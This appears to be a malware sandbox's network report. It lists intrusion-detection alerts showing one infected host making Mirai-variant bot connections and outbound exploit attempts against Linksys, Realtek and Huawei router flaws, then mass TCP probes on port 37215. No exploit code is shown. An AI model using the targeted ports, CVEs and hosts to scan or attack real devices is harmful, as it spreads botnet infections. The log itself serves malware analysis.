192.168.2.23172.65.169.10939674555552027153 05/14/22-02:12:39.774899	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	39674	55555	192.168.2.23	172.65.169.109
192.168.2.23172.65.231.233364555552027153 05/14/22-02:13:09.597097	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	33364	55555	192.168.2.23	172.65.231.2
192.168.2.2395.57.97.6840424802027121 05/14/22-02:13:39.679280	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	40424	80	192.168.2.23	95.57.97.68
192.168.2.2395.140.152.23150056802027121 05/14/22-02:12:01.355884	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	50056	80	192.168.2.23	95.140.152.231
192.168.2.23156.245.58.19151136528692027339 05/14/22-02:13:43.469946	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	51136	52869	192.168.2.23	156.245.58.191
192.168.2.2395.101.97.1744422802027121 05/14/22-02:12:41.078436	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44422	80	192.168.2.23	95.101.97.17
192.168.2.23172.245.60.19934734555552027153 05/14/22-02:12:33.796503	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	34734	55555	192.168.2.23	172.245.60.199
192.168.2.2395.217.167.13447040802027121 05/14/22-02:11:46.033771	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	47040	80	192.168.2.23	95.217.167.134
192.168.2.2395.215.156.6752884802027121 05/14/22-02:12:16.318734	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	52884	80	192.168.2.23	95.215.156.67
192.168.2.2395.101.46.19048630802027121 05/14/22-02:12:21.650694	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	48630	80	192.168.2.23	95.101.46.190
192.168.2.2395.217.235.13641662802027121 05/14/22-02:12:33.688261	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	41662	80	192.168.2.23	95.217.235.136
192.168.2.2395.233.89.22138802802027121 05/14/22-02:12:23.904902	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38802	80	192.168.2.23	95.233.89.221
192.168.2.23172.65.62.17956852555552027153 05/14/22-02:13:43.822168	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	56852	55555	192.168.2.23	172.65.62.179
192.168.2.2395.232.143.20460296802027121 05/14/22-02:12:18.496747	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	60296	80	192.168.2.23	95.232.143.204
192.168.2.23156.230.26.19155878528692027339 05/14/22-02:11:53.192069	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	55878	52869	192.168.2.23	156.230.26.191
192.168.2.23172.65.94.18738124555552027153 05/14/22-02:12:18.507683	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	38124	55555	192.168.2.23	172.65.94.187
192.168.2.23172.65.128.154408555552027153 05/14/22-02:12:33.812550	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	54408	55555	192.168.2.23	172.65.128.1
192.168.2.2398.156.215.14960094555552027153 05/14/22-02:12:39.490306	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	60094	55555	192.168.2.23	98.156.215.149
192.168.2.23172.65.185.13355574555552027153 05/14/22-02:12:13.767472	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	55574	55555	192.168.2.23	172.65.185.133
192.168.2.23172.65.84.3757214555552027153 05/14/22-02:13:39.278830	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	57214	55555	192.168.2.23	172.65.84.37
192.168.2.23172.65.96.15238076555552027153 05/14/22-02:12:00.125302	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	38076	55555	192.168.2.23	172.65.96.152
192.168.2.2395.140.158.5644624802027121 05/14/22-02:12:04.825916	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44624	80	192.168.2.23	95.140.158.56
192.168.2.2395.213.221.7259042802027121 05/14/22-02:12:07.007532	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	59042	80	192.168.2.23	95.213.221.72
192.168.2.23172.65.3.8833946555552027153 05/14/22-02:12:09.369030	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	33946	55555	192.168.2.23	172.65.3.88
192.168.2.23172.65.122.6336554555552027153 05/14/22-02:12:36.880562	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	36554	55555	192.168.2.23	172.65.122.63
192.168.2.2395.137.248.14536432802027121 05/14/22-02:12:08.453059	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	36432	80	192.168.2.23	95.137.248.145
192.168.2.23172.245.90.17253412555552027153 05/14/22-02:12:57.186108	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	53412	55555	192.168.2.23	172.245.90.172
192.168.2.23172.65.214.13053118555552027153 05/14/22-02:11:51.219527	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	53118	55555	192.168.2.23	172.65.214.130
192.168.2.2395.241.12.22138544802027121 05/14/22-02:11:55.060172	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38544	80	192.168.2.23	95.241.12.221
192.168.2.23172.65.182.18248080555552027153 05/14/22-02:13:35.706960	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	48080	55555	192.168.2.23	172.65.182.182
192.168.2.23172.65.121.9241308555552027153 05/14/22-02:12:09.369123	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	41308	55555	192.168.2.23	172.65.121.92
192.168.2.2395.101.184.23233834802027121 05/14/22-02:12:21.652251	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	33834	80	192.168.2.23	95.101.184.232
192.168.2.23156.232.88.7134042528692027339 05/14/22-02:13:40.087312	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	34042	52869	192.168.2.23	156.232.88.71
192.168.2.23172.65.178.4134822555552027153 05/14/22-02:12:03.763652	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	34822	55555	192.168.2.23	172.65.178.41
192.168.2.2388.247.218.18357044802027121 05/14/22-02:12:45.593968	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	57044	80	192.168.2.23	88.247.218.183
192.168.2.23172.65.69.9639336555552027153 05/14/22-02:12:07.296304	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	39336	55555	192.168.2.23	172.65.69.96
192.168.2.2395.101.179.12147784802027121 05/14/22-02:12:31.371567	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	47784	80	192.168.2.23	95.101.179.121
192.168.2.23156.224.24.20137358528692027339 05/14/22-02:12:48.476728	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	37358	52869	192.168.2.23	156.224.24.201
192.168.2.2395.6.51.10858676802027121 05/14/22-02:12:23.988881	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	58676	80	192.168.2.23	95.6.51.108
192.168.2.23172.65.85.10737946555552027153 05/14/22-02:13:35.724142	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	37946	55555	192.168.2.23	172.65.85.107
192.168.2.23172.65.254.1054364555552027153 05/14/22-02:11:51.219793	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	54364	55555	192.168.2.23	172.65.254.10
192.168.2.2395.216.233.12645134802027121 05/14/22-02:12:12.375722	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	45134	80	192.168.2.23	95.216.233.126
192.168.2.23172.65.161.12547106555552027153 05/14/22-02:11:53.487798	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	47106	55555	192.168.2.23	172.65.161.125
192.168.2.2395.153.16.9334294802027121 05/14/22-02:11:52.636220	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	34294	80	192.168.2.23	95.153.16.93
192.168.2.2395.216.46.16342972802027121 05/14/22-02:11:46.033701	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	42972	80	192.168.2.23	95.216.46.163
192.168.2.2395.38.149.7653014802027121 05/14/22-02:12:31.524055	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	53014	80	192.168.2.23	95.38.149.76
192.168.2.2395.79.118.17840476802027121 05/14/22-02:11:57.971047	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	40476	80	192.168.2.23	95.79.118.178
192.168.2.2388.249.29.11953336802027121 05/14/22-02:13:46.157357	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	53336	80	192.168.2.23	88.249.29.119
192.168.2.23172.65.68.14050106555552027153 05/14/22-02:12:34.813598	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	50106	55555	192.168.2.23	172.65.68.140
192.168.2.2388.221.77.4548254802027121 05/14/22-02:13:08.856075	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	48254	80	192.168.2.23	88.221.77.45
192.168.2.2395.15.240.18036256802027121 05/14/22-02:12:57.841983	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	36256	80	192.168.2.23	95.15.240.180
192.168.2.2388.145.17.11850038802027121 05/14/22-02:12:39.860168	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	50038	80	192.168.2.23	88.145.17.118
192.168.2.2395.137.248.6544254802027121 05/14/22-02:11:52.623905	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44254	80	192.168.2.23	95.137.248.65
192.168.2.2395.140.37.16651080802027121 05/14/22-02:12:12.365029	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	51080	80	192.168.2.23	95.140.37.166
192.168.2.23172.65.9.938206555552027153 05/14/22-02:13:05.459841	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	38206	55555	192.168.2.23	172.65.9.9
192.168.2.2395.217.81.20448500802027121 05/14/22-02:12:06.989141	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	48500	80	192.168.2.23	95.217.81.204
192.168.2.2395.112.170.4958398802027121 05/14/22-02:12:53.415920	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	58398	80	192.168.2.23	95.112.170.49
192.168.2.23172.255.80.23550844555552027153 05/14/22-02:12:37.003666	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	50844	55555	192.168.2.23	172.255.80.235
192.168.2.2395.58.115.23438118802027121 05/14/22-02:13:01.036403	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	38118	80	192.168.2.23	95.58.115.234
192.168.2.2395.57.36.24550622802027121 05/14/22-02:12:41.043513	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	50622	80	192.168.2.23	95.57.36.245
192.168.2.2395.217.183.13159274802027121 05/14/22-02:11:50.400173	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	59274	80	192.168.2.23	95.217.183.131
192.168.2.2395.42.196.18045740802027121 05/14/22-02:12:31.450640	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	45740	80	192.168.2.23	95.42.196.180
192.168.2.23172.65.10.5133430555552027153 05/14/22-02:12:33.795333	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	33430	55555	192.168.2.23	172.65.10.51
192.168.2.2388.250.111.14434764802027121 05/14/22-02:13:06.536692	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	34764	80	192.168.2.23	88.250.111.144
192.168.2.23172.65.79.23133478555552027153 05/14/22-02:12:16.062298	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	33478	55555	192.168.2.23	172.65.79.231
192.168.2.2395.155.16.12139454802027121 05/14/22-02:12:31.388864	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	39454	80	192.168.2.23	95.155.16.121
192.168.2.2395.179.219.13753258802027121 05/14/22-02:12:25.915169	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	53258	80	192.168.2.23	95.179.219.137
192.168.2.2395.234.230.9448464802027121 05/14/22-02:12:07.069322	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	48464	80	192.168.2.23	95.234.230.94
192.168.2.2395.216.174.17949448802027121 05/14/22-02:12:38.394262	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	49448	80	192.168.2.23	95.216.174.179
192.168.2.2395.65.7.17256166802027121 05/14/22-02:12:41.092384	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	56166	80	192.168.2.23	95.65.7.172
192.168.2.23156.225.158.444432528692027339 05/14/22-02:13:11.398903	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	44432	52869	192.168.2.23	156.225.158.4
192.168.2.2395.128.47.6334392802027121 05/14/22-02:11:57.648436	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	34392	80	192.168.2.23	95.128.47.63
192.168.2.2388.250.14.12748664802027121 05/14/22-02:12:43.303856	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	48664	80	192.168.2.23	88.250.14.127
192.168.2.2395.82.129.19756414802027121 05/14/22-02:12:48.726937	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	56414	80	192.168.2.23	95.82.129.197
192.168.2.2395.100.32.17844040802027121 05/14/22-02:12:38.583388	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44040	80	192.168.2.23	95.100.32.178
192.168.2.2341.182.106.16151982528692027339 05/14/22-02:12:34.004298	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	51982	52869	192.168.2.23	41.182.106.161
192.168.2.23156.226.87.24057702528692027339 05/14/22-02:12:14.078724	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	57702	52869	192.168.2.23	156.226.87.240
192.168.2.23156.250.28.8451218528692027339 05/14/22-02:12:30.163455	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	51218	52869	192.168.2.23	156.250.28.84
192.168.2.2388.221.178.11839856802027121 05/14/22-02:13:20.399630	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	39856	80	192.168.2.23	88.221.178.118
192.168.2.2395.219.228.15941954802027121 05/14/22-02:13:26.255296	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	41954	80	192.168.2.23	95.219.228.159
192.168.2.23172.65.103.5337110555552027153 05/14/22-02:13:39.278904	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	37110	55555	192.168.2.23	172.65.103.53
192.168.2.2395.179.136.2934744802027121 05/14/22-02:12:36.319934	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	34744	80	192.168.2.23	95.179.136.29
192.168.2.2395.35.24.8941260802027121 05/14/22-02:12:33.761799	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	41260	80	192.168.2.23	95.35.24.89
192.168.2.2395.130.28.14846038802027121 05/14/22-02:12:25.946869	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	46038	80	192.168.2.23	95.130.28.148
192.168.2.23172.65.247.10835834555552027153 05/14/22-02:11:56.029720	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	35834	55555	192.168.2.23	172.65.247.108
192.168.2.2395.100.78.1757512802027121 05/14/22-02:12:36.286426	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	57512	80	192.168.2.23	95.100.78.17
192.168.2.23156.226.101.14858192528692027339 05/14/22-02:13:26.890663	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	58192	52869	192.168.2.23	156.226.101.148
192.168.2.2395.214.217.5141366802027121 05/14/22-02:11:58.000914	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	41366	80	192.168.2.23	95.214.217.51
192.168.2.2395.223.112.7048866802027121 05/14/22-02:12:12.320419	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	48866	80	192.168.2.23	95.223.112.70
192.168.2.2395.142.206.19256690802027121 05/14/22-02:13:14.627398	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	56690	80	192.168.2.23	95.142.206.192
192.168.2.2395.110.252.1742942802027121 05/14/22-02:11:57.661872	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	42942	80	192.168.2.23	95.110.252.17
192.168.2.23172.65.66.17232904555552027153 05/14/22-02:13:28.458438	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	32904	55555	192.168.2.23	172.65.66.172
192.168.2.2395.101.105.3756486802027121 05/14/22-02:12:16.042664	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	56486	80	192.168.2.23	95.101.105.37
192.168.2.2395.100.75.16236528802027121 05/14/22-02:12:01.373649	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	36528	80	192.168.2.23	95.100.75.162
192.168.2.23156.226.61.6434088528692027339 05/14/22-02:12:33.965935	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	34088	52869	192.168.2.23	156.226.61.64
192.168.2.23156.244.118.3341258528692027339 05/14/22-02:13:12.911524	TCP	2027339	ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound	41258	52869	192.168.2.23	156.244.118.33
192.168.2.2395.120.26.12140584802027121 05/14/22-02:12:28.116129	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	40584	80	192.168.2.23	95.120.26.121
192.168.2.2395.159.60.13046212802027121 05/14/22-02:12:21.738119	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	46212	80	192.168.2.23	95.159.60.130
192.168.2.2395.144.20.16144268802027121 05/14/22-02:13:26.124337	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44268	80	192.168.2.23	95.144.20.161
192.168.2.2395.100.51.21344342802027121 05/14/22-02:12:36.297626	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44342	80	192.168.2.23	95.100.51.213
192.168.2.23172.65.3.22346802555552027153 05/14/22-02:11:51.219645	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	46802	55555	192.168.2.23	172.65.3.223
192.168.2.2395.154.250.9959566802027121 05/14/22-02:12:18.483021	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	59566	80	192.168.2.23	95.154.250.99
192.168.2.23172.65.43.20237380555552027153 05/14/22-02:12:26.237883	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	37380	55555	192.168.2.23	172.65.43.202
192.168.2.2395.59.51.16444564802027121 05/14/22-02:12:09.948969	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	44564	80	192.168.2.23	95.59.51.164
192.168.2.23197.148.89.3543430372152835222 05/14/22-02:11:47.945469	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	43430	37215	192.168.2.23	197.148.89.35
192.168.2.23172.65.54.19344722555552027153 05/14/22-02:13:28.810687	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	44722	55555	192.168.2.23	172.65.54.193
192.168.2.2395.159.46.8743460802027121 05/14/22-02:11:49.354543	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	43460	80	192.168.2.23	95.159.46.87
192.168.2.2395.216.160.19341248802027121 05/14/22-02:11:52.570919	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	41248	80	192.168.2.23	95.216.160.193
192.168.2.23172.65.46.1047160555552027153 05/14/22-02:12:20.938865	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	47160	55555	192.168.2.23	172.65.46.10
192.168.2.2395.156.55.12440254802027121 05/14/22-02:12:33.801748	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	40254	80	192.168.2.23	95.156.55.124
192.168.2.23172.65.32.10158782555552027153 05/14/22-02:13:15.170260	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	58782	55555	192.168.2.23	172.65.32.101
192.168.2.2395.100.6.21858038802027121 05/14/22-02:12:07.025093	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	58038	80	192.168.2.23	95.100.6.218
192.168.2.23172.247.6.5849348555552027153 05/14/22-02:13:28.793318	TCP	2027153	ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound	49348	55555	192.168.2.23	172.247.6.58

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2022 02:11:43.852212906 CEST	36087	37215	192.168.2.23	197.71.249.223
May 14, 2022 02:11:43.852226019 CEST	36087	37215	192.168.2.23	197.50.163.183
May 14, 2022 02:11:43.852493048 CEST	36087	37215	192.168.2.23	197.120.164.221
May 14, 2022 02:11:43.852500916 CEST	36087	37215	192.168.2.23	197.161.139.231
May 14, 2022 02:11:43.852504015 CEST	36087	37215	192.168.2.23	197.176.129.73
May 14, 2022 02:11:43.852529049 CEST	36087	37215	192.168.2.23	197.202.224.34
May 14, 2022 02:11:43.852574110 CEST	36087	37215	192.168.2.23	197.174.71.85
May 14, 2022 02:11:43.852586985 CEST	36087	37215	192.168.2.23	197.140.69.244
May 14, 2022 02:11:43.852596998 CEST	36087	37215	192.168.2.23	197.183.140.121
May 14, 2022 02:11:43.852642059 CEST	36087	37215	192.168.2.23	197.80.175.154
May 14, 2022 02:11:43.852646112 CEST	36087	37215	192.168.2.23	197.195.177.70
May 14, 2022 02:11:43.852649927 CEST	36087	37215	192.168.2.23	197.180.136.59
May 14, 2022 02:11:43.852653027 CEST	36087	37215	192.168.2.23	197.47.193.131
May 14, 2022 02:11:43.852658987 CEST	36087	37215	192.168.2.23	197.138.198.220
May 14, 2022 02:11:43.852663040 CEST	36087	37215	192.168.2.23	197.133.224.147
May 14, 2022 02:11:43.852663994 CEST	36087	37215	192.168.2.23	197.185.83.175
May 14, 2022 02:11:43.852669001 CEST	36087	37215	192.168.2.23	197.37.169.30
May 14, 2022 02:11:43.852670908 CEST	36087	37215	192.168.2.23	197.33.57.180
May 14, 2022 02:11:43.852679968 CEST	36087	37215	192.168.2.23	197.228.131.62
May 14, 2022 02:11:43.852680922 CEST	36087	37215	192.168.2.23	197.126.175.118
May 14, 2022 02:11:43.852684975 CEST	36087	37215	192.168.2.23	197.40.251.106
May 14, 2022 02:11:43.852685928 CEST	36087	37215	192.168.2.23	197.232.198.99
May 14, 2022 02:11:43.852686882 CEST	36087	37215	192.168.2.23	197.11.39.246
May 14, 2022 02:11:43.852688074 CEST	36087	37215	192.168.2.23	197.93.91.51
May 14, 2022 02:11:43.852690935 CEST	36087	37215	192.168.2.23	197.147.5.250
May 14, 2022 02:11:43.852694035 CEST	36087	37215	192.168.2.23	197.140.219.27
May 14, 2022 02:11:43.852695942 CEST	36087	37215	192.168.2.23	197.51.21.7
May 14, 2022 02:11:43.852699995 CEST	36087	37215	192.168.2.23	197.69.89.162
May 14, 2022 02:11:43.852706909 CEST	36087	37215	192.168.2.23	197.51.178.46
May 14, 2022 02:11:43.852710009 CEST	36087	37215	192.168.2.23	197.138.238.6
May 14, 2022 02:11:43.852713108 CEST	36087	37215	192.168.2.23	197.124.18.175
May 14, 2022 02:11:43.852715969 CEST	36087	37215	192.168.2.23	197.104.143.162
May 14, 2022 02:11:43.852741957 CEST	36087	37215	192.168.2.23	197.229.146.204
May 14, 2022 02:11:43.852754116 CEST	36087	37215	192.168.2.23	197.226.39.74
May 14, 2022 02:11:43.852762938 CEST	36087	37215	192.168.2.23	197.163.223.43
May 14, 2022 02:11:43.852766991 CEST	36087	37215	192.168.2.23	197.255.104.118
May 14, 2022 02:11:43.852771997 CEST	36087	37215	192.168.2.23	197.224.168.3
May 14, 2022 02:11:43.852771997 CEST	36087	37215	192.168.2.23	197.32.253.105
May 14, 2022 02:11:43.852777958 CEST	36087	37215	192.168.2.23	197.182.181.107
May 14, 2022 02:11:43.852782011 CEST	36087	37215	192.168.2.23	197.134.123.184
May 14, 2022 02:11:43.852786064 CEST	36087	37215	192.168.2.23	197.14.50.78
May 14, 2022 02:11:43.852792978 CEST	36087	37215	192.168.2.23	197.35.168.165
May 14, 2022 02:11:43.852794886 CEST	36087	37215	192.168.2.23	197.82.180.60
May 14, 2022 02:11:43.852794886 CEST	36087	37215	192.168.2.23	197.153.127.201
May 14, 2022 02:11:43.852799892 CEST	36087	37215	192.168.2.23	197.78.154.198
May 14, 2022 02:11:43.852803946 CEST	36087	37215	192.168.2.23	197.254.172.58
May 14, 2022 02:11:43.852848053 CEST	36087	37215	192.168.2.23	197.72.207.173
May 14, 2022 02:11:43.852855921 CEST	36087	37215	192.168.2.23	197.227.139.19
May 14, 2022 02:11:43.852858067 CEST	36087	37215	192.168.2.23	197.213.249.182
May 14, 2022 02:11:43.852864981 CEST	36087	37215	192.168.2.23	197.186.42.81
May 14, 2022 02:11:43.852866888 CEST	36087	37215	192.168.2.23	197.46.20.4
May 14, 2022 02:11:43.852870941 CEST	36087	37215	192.168.2.23	197.7.22.172
May 14, 2022 02:11:43.852871895 CEST	36087	37215	192.168.2.23	197.244.116.184
May 14, 2022 02:11:43.852875948 CEST	36087	37215	192.168.2.23	197.106.95.45
May 14, 2022 02:11:43.852881908 CEST	36087	37215	192.168.2.23	197.234.164.115
May 14, 2022 02:11:43.852889061 CEST	36087	37215	192.168.2.23	197.232.144.103
May 14, 2022 02:11:43.852895975 CEST	36087	37215	192.168.2.23	197.166.46.206
May 14, 2022 02:11:43.852905035 CEST	36087	37215	192.168.2.23	197.193.64.49
May 14, 2022 02:11:43.852911949 CEST	36087	37215	192.168.2.23	197.200.82.30
May 14, 2022 02:11:43.852911949 CEST	36087	37215	192.168.2.23	197.10.147.69
May 14, 2022 02:11:43.852915049 CEST	36087	37215	192.168.2.23	197.137.20.164
May 14, 2022 02:11:43.852921963 CEST	36087	37215	192.168.2.23	197.180.47.100
May 14, 2022 02:11:43.852925062 CEST	36087	37215	192.168.2.23	197.245.185.191
May 14, 2022 02:11:43.852927923 CEST	36087	37215	192.168.2.23	197.84.229.134
May 14, 2022 02:11:43.852932930 CEST	36087	37215	192.168.2.23	197.75.98.121
May 14, 2022 02:11:43.852937937 CEST	36087	37215	192.168.2.23	197.202.175.101
May 14, 2022 02:11:43.852947950 CEST	36087	37215	192.168.2.23	197.236.147.202
May 14, 2022 02:11:43.852950096 CEST	36087	37215	192.168.2.23	197.244.148.141
May 14, 2022 02:11:43.852956057 CEST	36087	37215	192.168.2.23	197.153.228.243
May 14, 2022 02:11:43.852958918 CEST	36087	37215	192.168.2.23	197.200.43.103
May 14, 2022 02:11:43.852957964 CEST	36087	37215	192.168.2.23	197.217.170.46
May 14, 2022 02:11:43.852963924 CEST	36087	37215	192.168.2.23	197.90.35.91
May 14, 2022 02:11:43.852967024 CEST	36087	37215	192.168.2.23	197.120.152.171
May 14, 2022 02:11:43.852969885 CEST	36087	37215	192.168.2.23	197.103.196.80
May 14, 2022 02:11:43.852973938 CEST	36087	37215	192.168.2.23	197.238.156.47
May 14, 2022 02:11:43.852977991 CEST	36087	37215	192.168.2.23	197.213.221.189
May 14, 2022 02:11:43.852977991 CEST	36087	37215	192.168.2.23	197.72.77.134
May 14, 2022 02:11:43.852981091 CEST	36087	37215	192.168.2.23	197.132.44.207
May 14, 2022 02:11:43.852981091 CEST	36087	37215	192.168.2.23	197.89.20.218
May 14, 2022 02:11:43.852982044 CEST	36087	37215	192.168.2.23	197.125.237.107
May 14, 2022 02:11:43.852982044 CEST	36087	37215	192.168.2.23	197.40.79.74
May 14, 2022 02:11:43.852983952 CEST	36087	37215	192.168.2.23	197.121.143.57
May 14, 2022 02:11:43.852987051 CEST	36087	37215	192.168.2.23	197.28.51.24
May 14, 2022 02:11:43.852988958 CEST	36087	37215	192.168.2.23	197.217.19.5
May 14, 2022 02:11:43.852992058 CEST	36087	37215	192.168.2.23	197.226.72.148
May 14, 2022 02:11:43.852992058 CEST	36087	37215	192.168.2.23	197.16.62.175
May 14, 2022 02:11:43.852994919 CEST	36087	37215	192.168.2.23	197.110.58.166
